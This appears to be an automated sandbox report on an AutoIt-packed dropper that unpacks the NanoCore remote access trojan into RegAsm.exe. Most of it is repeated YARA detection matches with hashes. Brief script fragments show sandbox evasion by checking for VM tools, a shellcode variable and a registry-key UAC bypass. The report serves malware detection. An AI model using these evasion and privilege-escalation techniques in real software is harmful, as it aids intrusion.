Source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Binary is likely a compiled AutoIt script file

Show sources

Source: wIQLBHYbqz.exe, 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: wIQLBHYbqz.exe, 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: RMActivate_isv.exe.bat, 0000000E.00000000.473380616.00000000004B5000.00000002.00020000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: RMActivate_isv.exe.bat, 0000000E.00000000.473380616.00000000004B5000.00000002.00020000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: wIQLBHYbqz.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: wIQLBHYbqz.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer

AutoIt script contains suspicious strings

Show sources

Source: wIQLBHYbqz.exe	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = BTBXJY
Source: wIQLBHYbqz.exe	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: wIQLBHYbqz.exe	AutoIt Script: 5,62" ) ) ) LOCAL $LPSHELLCODE = $E ($B (BTBXJYMRF
Source: wIQLBHYbqz.exe	AutoIt Script: ) $GOWQQZFKJDEL ("HKCU\Software\Classes\ms-settings\shell\open\command" , BTBXJYMRFGAETPA
Source: RMActivate_isv.exe.bat.0.dr	AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = BTBXJY
Source: RMActivate_isv.exe.bat.0.dr	AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: RMActivate_isv.exe.bat.0.dr	AutoIt Script: 5,62" ) ) ) LOCAL $LPSHELLCODE = $E ($B (BTBXJYMRF
Source: RMActivate_isv.exe.bat.0.dr	AutoIt Script: ) $GOWQQZFKJDEL ("HKCU\Software\Classes\ms-settings\shell\open\command" , BTBXJYMRFGAETPA

Source: wIQLBHYbqz.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.56f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.56f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
